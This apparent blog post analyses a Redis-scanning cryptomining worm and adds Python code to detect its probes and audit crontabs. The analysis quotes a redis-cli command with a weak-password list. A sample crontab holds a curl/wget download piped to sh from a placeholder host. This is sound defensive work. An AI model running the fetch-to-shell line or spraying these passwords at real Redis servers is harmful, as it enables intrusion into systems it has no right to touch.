Comment
Author: Admin | 2025-04-28
- Install the required software via the apt-get or yum package managers. The required software includes redis-tools, iptables, wget, curl, and unhide.
- Kill hidden processes.
- Download and install masscan and pnscan.
- Download and execute rs.sh.

rs.sh

This malicious, custom-made script performs scans for Redis instances, which usually listen on port 6379. Two publicly available scanners, pnscan and masscan, are used for the scanning task. The script carries out the following actions:

1. Block all incoming traffic to port 6379 and allow only incoming traffic from localhost, using the iptables command.
2. Create a .dat file (its contents are not reproduced in this excerpt). This method was described in Scenario 1.
3. Scan port 6379 with pnscan. pnscan sends the bytes *1\r\n$4\r\ninfo\r\n (a RESP-encoded INFO command) and looks for os:Linux in the response from the scanned machine.
4. Scan port 6379 with masscan. The scan is run with the shard parameter to randomly choose one of 22,000 IP address subsets.
5. Scan port 6379 with masscan over ranges of private IP addresses and ranges belonging to Alibaba Cloud, Chinanet Shanghai, and China Unicom.
6. Scan port 6379 with masscan over the IP addresses of the current network interfaces (obtained with the ip a command).
7. For each active Redis instance found via the scanning tasks in 3 to 6, run:

redis-cli -h HOST -p PORT --raw -a PASSWORD --raw

with PASSWORD taken from the following list of weak passwords:

- empty password
- redis
- root
- oracle
- password
- p@aaw0rd
- abc123
- abc123!
- 123456
- admin

After a successful connection to a newly found Redis instance, the init.sh script is executed via Scenario 1 and the whole infection process is repeated.

Apart from the scripts analyzed above, the malware also uses a few binaries.

The watchdog process, a Golang-compiled binary, mainly starts four watchdog threads:

- main_dog_protect_cron_thread: checks for persistence in cron and, if necessary, adds it.
- main_dog_protect_process_thread: checks whether the required processes are running and, if not, starts them.
- main_dog_update_thread: if new versions are available, updates the miner, config, scanner, and watchdog binaries.
- main_dog_protect_cc_thread: checks whether a command-and-control (C&C) server is active. If it is not, the thread looks up a hard-coded address via the Ethereum blockchain explorer and transforms the blockchain data into a new C&C server address. This is a very useful feature for the attackers, especially when they lose control of the current C&C servers. After a new C&C address is obtained, the thread checks whether that server is active; if it is, the thread appends a hard-coded string with a URL path, downloads the init.ps or init.sh initialization script, and the whole infection process starts again from the beginning.

As of the publication of this article, there are no transactions associated with the hard-coded Ethereum address.

The scanner process, also a Golang-compiled executable, contains a set of exploits for various online services and devices. The main_scan procedure calls the following scanning methods:

- scan_exp_Cctv_exploit
- scan_exp_Redis_exploit
- scan_exp_Drupal_exploit
- scan_exp_Hadoop_exploit
- scan_exp_Spring_exploit
- scan_exp_Thinkphp_exploit
- scan_exp_Weblogic_exploit
- scan_exp_Sqlserver_exploit
- scan_exp_Elasticsearch_exploit

Alibaba Cloud Security published an analysis of the scanner module with a list of exploits that is almost identical to the list above, with the addition of a new CCTV exploit routine.

It is important to note that there is also a version of Case 1 for Windows using PowerShell; the Task Scheduler is used for persistence, while netsh and net user are used
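The pnscan probe (step 3 of rs.sh) and the redis-cli password spray (step 7) are small enough to reproduce and to detect. The block below is an added example written for this page, not code from the malware or from the original analysis: it encodes RESP commands the way redis-cli and pnscan put them on the wire, parses an INFO reply and applies the same os:Linux check, and labels a captured client-to-server payload on port 6379 as the probe, an AUTH carrying one of the listed weak passwords, some other AUTH, or unrelated traffic. The INFO reply is constructed for the example, and probe_host is an assumed helper for hosts you are authorized to test; nothing in it is the page's own code.

```python
import re
import socket

# RESP (Redis serialization protocol) array of bulk strings, the wire form
# redis-cli and pnscan use. Added example, not the malware's code.
def resp_command(*args: str) -> bytes:
    """Encode a Redis command, e.g. INFO -> b'*1\\r\\n$4\\r\\ninfo\\r\\n'."""
    out = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        out.append(f"${len(raw)}\r\n".encode() + raw + b"\r\n")
    return b"".join(out)

# The exact bytes pnscan sends, as quoted in the analysis above.
PNSCAN_PROBE = resp_command("info")

# The weak password list from the analysis above; "" is the empty password.
WEAK_PASSWORDS = ["", "redis", "root", "oracle", "password", "p@aaw0rd",
                  "abc123", "abc123!", "123456", "admin"]

def parse_info(reply: bytes) -> dict:
    """Parse an INFO reply (a RESP bulk string of key:value lines) into a dict.
    Error replies such as '-NOAUTH ...' from a password-protected instance
    are not bulk strings and yield an empty dict."""
    if not reply.startswith(b"$"):
        return {}
    header, _, body = reply.partition(b"\r\n")
    body = body[:int(header[1:])]
    fields = {}
    for line in body.decode(errors="replace").splitlines():
        if line.startswith("#") or ":" not in line:
            continue
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip()
    return fields

def is_linux_redis(reply: bytes) -> bool:
    """pnscan's success condition: the INFO reply carries os:Linux."""
    return parse_info(reply).get("os", "").startswith("Linux")

# 'AUTH <password>' as redis-cli -a sends it: a two-element RESP array.
AUTH_PREFIX = re.compile(rb"\*2\r\n\$4\r\nAUTH\r\n\$(\d+)\r\n", re.IGNORECASE)

def classify_payload(payload: bytes) -> str:
    """Label one client-to-server TCP payload captured on port 6379."""
    if payload == PNSCAN_PROBE:
        return "pnscan-info-probe"
    m = AUTH_PREFIX.match(payload)
    if m:
        n = int(m.group(1))
        password = payload[m.end():m.end() + n].decode(errors="replace")
        return "weak-auth:" + password if password in WEAK_PASSWORDS else "auth"
    return "other"

def probe_host(host: str, port: int = 6379, timeout: float = 3.0) -> bool:
    """Assumed helper: send the pnscan probe to a host you are authorized to
    test and apply the os:Linux check. Redis keeps the connection open, so the
    read loop ends on the socket timeout. Not used by the offline checks."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(PNSCAN_PROBE)
        chunks = []
        try:
            while True:
                chunk = s.recv(65536)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass
    return is_linux_redis(b"".join(chunks))

# Constructed INFO reply (not captured from a real host), carrying only the
# fields that matter here; the bulk-string length is computed, not hand-typed.
SAMPLE_INFO_BODY = (b"# Server\r\nredis_version:5.0.7\r\n"
                    b"os:Linux 4.15.0-91-generic x86_64\r\narch_bits:64\r\n")
SAMPLE_INFO_REPLY = b"$%d\r\n%s\r\n" % (len(SAMPLE_INFO_BODY), SAMPLE_INFO_BODY)

if __name__ == "__main__":
    print("probe bytes:", PNSCAN_PROBE)
    print("sample reply is Linux Redis:", is_linux_redis(SAMPLE_INFO_REPLY))
    for p in (PNSCAN_PROBE, resp_command("AUTH", "p@aaw0rd"),
              resp_command("AUTH", "Tr0ub4dor&3-long"), resp_command("PING")):
        print(classify_payload(p))
```

An instance with requirepass set answers INFO with -NOAUTH, so the os:Linux check only fires on instances that answer unauthenticated; from the network side, the probe bytes followed by AUTH attempts with the listed passwords from one source are the rs.sh steps 3 and 7 in order.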
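The main_dog_protect_cron_thread check (is the cron entry there; if not, add it) is simple to turn around for defence. The block below is an added example of my own, not the watchdog's code: it parses a crontab into schedule and command pairs, answers the watchdog-style question of whether a given command is scheduled, and flags the two traits the infection chain above relies on, a curl or wget download piped into a shell and a binary run from a scratch directory. The sample crontab, the example.invalid hostname and the /tmp/.x path are constructed for the illustration and the flagged traits are my choice, not signatures from the original analysis.

```python
import re
from typing import Dict, List, Tuple

# Traits worth flagging in a cron entry (chosen for this example, not taken
# from the original analysis).
DOWNLOAD_TOOL = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")
SCRATCH_PATH = re.compile(r"(?<![\w/])(/tmp|/var/tmp|/dev/shm)/")

def parse_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (schedule, command) pairs. Comments, blank lines and VAR=value
    assignments are skipped; @reboot-style schedules are kept as one token."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        if line.startswith("@"):
            schedule, _, command = line.partition(" ")
        else:
            parts = line.split(None, 5)        # five time fields, then the command
            if len(parts) < 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append((schedule, command.strip()))
    return entries

def has_entry(text: str, command: str) -> bool:
    """The watchdog-style check, used here as an audit: is this command scheduled?"""
    return any(cmd == command for _, cmd in parse_crontab(text))

def audit_crontab(text: str) -> List[Dict[str, object]]:
    """Flag entries that download-and-execute or run from a scratch directory."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        if DOWNLOAD_TOOL.search(command) and PIPE_TO_SHELL.search(command):
            reasons.append("download-and-execute")
        if SCRATCH_PATH.search(command):
            reasons.append("runs-from-scratch-dir")
        if reasons:
            findings.append({"schedule": schedule, "command": command,
                             "reasons": reasons})
    return findings

# Constructed sample, not a real crontab; example.invalid is a reserved
# placeholder name and /tmp/.x is an assumed path.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/sh
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/10 * * * * (curl -fsSL http://example.invalid/init.sh || wget -q -O- http://example.invalid/init.sh) | sh
@reboot /tmp/.x/watchdog
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f["schedule"], f["command"], ",".join(f["reasons"]))
```

Run it over the output of crontab -l for each user and over the files under /etc/cron.d; a watchdog that re-adds its entry every few minutes shows up as the same finding reappearing after you remove it, which is the cue to look for the running watchdog process rather than the cron line.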